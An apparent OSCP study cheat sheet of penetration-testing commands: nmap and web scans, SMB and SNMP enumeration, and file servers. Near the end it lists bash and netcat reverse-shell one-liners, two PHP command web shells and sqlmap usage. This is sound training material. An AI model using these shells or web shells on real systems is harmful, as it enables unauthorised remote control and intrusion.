
In a previous article we shared a wide range of tools for subdomain enumeration that help pentesters and bug hunters collect subdomains for the domain they are targeting.
Enumeration is the most important thing you can do. At the inevitable stage where you find yourself hitting a wall, 90% of the time it will be because you haven't done enough enumeration.
There are a ton of certifications in the hacking and security domain, but Offensive Security certifications are the ones that make you feel you have actually earned it, rather than having crossed your fingers through a multiple-choice exam.
Yes, we're talking about OSCP (Offensive Security Certified Professional). The OSCP preparation, lab and exam are a journey of excitement, pain, suffering, frustration, confidence and motivation, with constant learning throughout.
Below are a few commands that are very helpful for OSCP preparation. 192.168.1.10 is a placeholder address; in every section except Reverse Shells it is the target host.
Nmap Commands
[#] Quick TCP Scan
Command: nmap -sC -sV -vv -oA quick 192.168.1.10
[#] Quick UDP Scan
Command: nmap -sU -sV -vv -oA quick_udp 192.168.1.10
Note: UDP scanning is slow, because a closed port only shows up as an ICMP port-unreachable reply and an open port often gives no reply at all, so version detection against the default 1000 UDP ports can run for a long time. Start it in the background and work on the TCP results meanwhile; SNMP (161/udp) and TFTP (69/udp) are the services most often found this way.
[#] Full TCP Scan
Command: nmap -sC -sV -p- -vv -oA full 192.168.1.10
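Added example, not from the original article: the scans above write greppable output (quick.gnmap, full.gnmap) because of -oA. The helper below pulls the open TCP ports out of such a file and builds the targeted -sC -sV follow-up scan for only those ports, which is how the full -p- scan is used in practice: discover every port first, then run scripts and version detection against the ports found rather than all 65535. The greppable text embedded in the block is constructed sample data that mimics a quick.gnmap file, and the follow-up output name "targeted" is an assumption.

```shell
#!/bin/sh
# Added example: turn nmap greppable output (-oA writes <name>.gnmap) into a
# targeted follow-up scan. SAMPLE_GNMAP is constructed to look like the
# quick.gnmap written by the quick TCP scan; it is not real scan output.

SAMPLE_GNMAP='# Nmap 7.94 scan initiated as: nmap -sC -sV -vv -oA quick 192.168.1.10
Host: 192.168.1.10 ()  Status: Up
Host: 192.168.1.10 ()  Ports: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu/, 80/open/tcp//http//Apache httpd 2.4.18/, 139/filtered/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Samba smbd 3.X - 4.X/  Ignored State: closed (996)
# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds'

# open_tcp_ports: read greppable output on stdin and print a sorted,
# comma-separated list of the TCP ports reported as open (e.g. 22,80,445).
# Filtered and closed entries are dropped because the state field is part
# of the pattern being matched.
open_tcp_ports() {
    grep -o '[0-9][0-9]*/open/tcp' | cut -d/ -f1 | sort -n | uniq | paste -s -d , -
}

# targeted_scan_cmd HOST PORTS: build the follow-up command that runs the
# default scripts and version detection only against the ports found.
targeted_scan_cmd() {
    printf 'nmap -sC -sV -vv -p %s -oA targeted %s\n' "$2" "$1"
}

# Usage on a real file once the full scan has finished:
#   ports=$(open_tcp_ports < full.gnmap)
#   targeted_scan_cmd 192.168.1.10 "$ports"   # copy and run the printed command
ports=$(printf '%s\n' "$SAMPLE_GNMAP" | open_tcp_ports)
targeted_scan_cmd 192.168.1.10 "$ports"
```

The same pattern works for the UDP output (quick_udp.gnmap) by changing /open/tcp to /open/udp and -p to -sU -p; version detection on a handful of confirmed UDP ports finishes in seconds where the blind scan took many minutes.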
Web Scanning
[#] Nikto
Command: nikto -h 192.168.1.10
[#] Dirsearch
Command: python dirsearch.py -u http://192.168.1.10 -e php,txt,html,log,conf,cfg,ini,pdf -x 301,403,503,302 --random-agent
[#] Directory Buster
Command: dirb http://192.168.1.10/ /usr/share/wordlists/dirb/common.txt
[#] Whatweb
Command: whatweb -v -a 3 192.168.1.10
[#] Gobuster
Command: gobuster dir -e -u http://192.168.1.10/ -w /usr/share/wordlists/dirb/common.txt
Note: gobuster 3.x requires the dir subcommand (dns is the subdomain mode); the 2.x releases take the same flags without it. -e prints full URLs instead of bare paths.
[#] Wfuzz
Command: wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.10/FUZZ
Note: wfuzz substitutes each wordlist entry at the literal FUZZ keyword, so the URL must contain it or nothing is fuzzed; --hc 404 hides responses with that status code.
[#] WPScan
Command: wpscan --url http://192.168.1.10/
Note: -u was the wpscan 2.x flag; 3.x only accepts --url.
[#] Joomscan
Command: joomscan -u http://192.168.1.10/
Port Checking
[#] Netcat Banner Grabbing
Command: nc -nv 192.168.1.10 <port>
[#] Telnet Banner Grabbing
Command: telnet 192.168.1.10 <port>
Note: replace <port> with the port under test. Services such as SSH, FTP and SMTP send a banner on connect; HTTP only answers once you send a request line (type HEAD / HTTP/1.0 and press Enter twice), and SMTP reveals more after EHLO test.
SMB
[#] SMB Vulnerability Scan
Command: nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 192.168.1.10
[#] SMB Users & Shares Scan
Command: nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.1.10
[#] Enum4linux
Command: enum4linux -a 192.168.1.10
[#] Null connect
Command: rpcclient -U "" -N 192.168.1.10
Note: -U "" with -N requests an anonymous (null) session without prompting for a password. If the connection is accepted, rpcclient subcommands such as srvinfo, enumdomusers and querydominfo enumerate the host and its users.
[#] Connect to SMB share
Command: smbclient //192.168.1.10/share -N
Note: replace share with a share name reported by the SMB shares scan or enum4linux above; -N tries a null session with no password.
SNMP
[#] SNMP Enumeration
Command: snmp-check 192.168.1.10 -c public
Python Servers
[#] Simple Web Server
Command: python3 -m http.server 80
Note: python -m SimpleHTTPServer 80 is the Python 2 equivalent, which modern Kali no longer ships. Both serve the current working directory, so run them from the directory holding the files you want the target to fetch; binding port 80 needs root.
[#] FTP Server
Command: python -m pyftpdlib -p 21 -w
Reverse Shells
In this section 192.168.1.10 is the attacker's machine, not the target: start a netcat listener on port 4443 there first, then run the command on the target so that it connects back.
[#] Bash Shell
Command: bash -i >& /dev/tcp/192.168.1.10/4443 0>&1
[#] Netcat linux
Command: nc -e /bin/sh 192.168.1.10 4443
[#] Netcat windows
Command: nc -e cmd.exe 192.168.1.10 4443
Note: -e only exists in nc.traditional and ncat; the OpenBSD netcat that Debian and Ubuntu install by default has no -e, in which case use the bash /dev/tcp shell above instead.
PHP
[#] PHP web shell: run a command taken from a GET parameter with system()
Command: <?php system($_GET["cmd"]); ?>
[#] PHP web shell: run a command taken from a GET parameter with shell_exec()
Command: <?php echo shell_exec($_GET["cmd"]); ?>
Note: system() writes the command's output itself and returns only its last line, so an echo in front of it just repeats that line; shell_exec() returns the whole output as a string and prints nothing, so there the echo is required. Request the uploaded file with ?cmd=id appended, URL-encoding anything other than a simple word.
SQL Injection
[#] SQL Injection Exploitation with Sqlmap
Command: sqlmap -u http://10.10.10.10 --dbs
Note: sqlmap needs an injectable parameter to test, so pass the full URL including its GET parameters (or a POST body with --data) rather than the bare host; --dbs lists the databases once an injection has been confirmed.